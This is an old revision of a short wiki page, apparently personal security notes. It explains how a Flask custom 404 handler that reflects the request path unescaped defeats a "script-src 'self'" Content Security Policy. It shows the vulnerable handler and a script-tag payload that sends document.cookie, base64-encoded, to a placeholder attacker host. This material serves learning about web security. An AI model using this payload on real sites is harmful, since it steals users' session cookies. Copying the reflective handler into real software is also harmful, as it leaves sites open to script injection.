csp-bypass-custom-404
This is an old revision of the document!
Bypass CSP when a custom 404 page is present
With:
resp.headers['Content-Security-Policy'] = "script-src 'self';
And a custom 404 page like:
@app.errorhandler(404)
def page_not_found(error):
path = request.path
return f"{path} not found"
It's possible to reflect JS in the same origin.
E.g.
<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>
csp-bypass-custom-404.1724526768.txt.gz · Last modified: 2024/08/24 19:12 by osorin